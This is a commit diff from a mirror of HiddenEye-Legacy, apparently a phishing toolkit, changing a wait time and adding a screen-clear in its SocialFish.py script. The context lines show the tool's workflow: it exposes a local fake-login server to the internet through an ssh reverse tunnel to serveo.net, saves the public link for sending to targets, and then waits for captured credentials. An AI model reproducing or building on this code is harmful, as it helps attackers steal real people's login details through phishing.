mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Update SocialFish.py
This commit is contained in:
parent
c67cc1914a
commit
9738ee7ed7
|
@ -285,7 +285,7 @@ def runPEnv():
|
||||||
|
|
||||||
def serveo():
|
def serveo():
|
||||||
system('ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:1111 serveo.net > sendlink.txt 2> /dev/null & ')
|
system('ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:1111 serveo.net > sendlink.txt 2> /dev/null & ')
|
||||||
sleep(4)
|
sleep(10)
|
||||||
f = open('sendlink.txt', 'r')
|
f = open('sendlink.txt', 'r')
|
||||||
a = ['[32m', 'Forwarding', 'HTTP', 'traffic', 'from', '[0m', ' ']
|
a = ['[32m', 'Forwarding', 'HTTP', 'traffic', 'from', '[0m', ' ']
|
||||||
lst = []
|
lst = []
|
||||||
|
@ -333,7 +333,8 @@ if __name__ == "__main__":
|
||||||
elif choice == '2':
|
elif choice == '2':
|
||||||
serveo()
|
serveo()
|
||||||
else:
|
else:
|
||||||
return server()
|
system('clear')
|
||||||
|
return server()
|
||||||
server()
|
server()
|
||||||
multiprocessing.Process(target=runServer).start()
|
multiprocessing.Process(target=runServer).start()
|
||||||
waitCreds()
|
waitCreds()
|
||||||
|
|
Loading…
Reference in New Issue
Block a user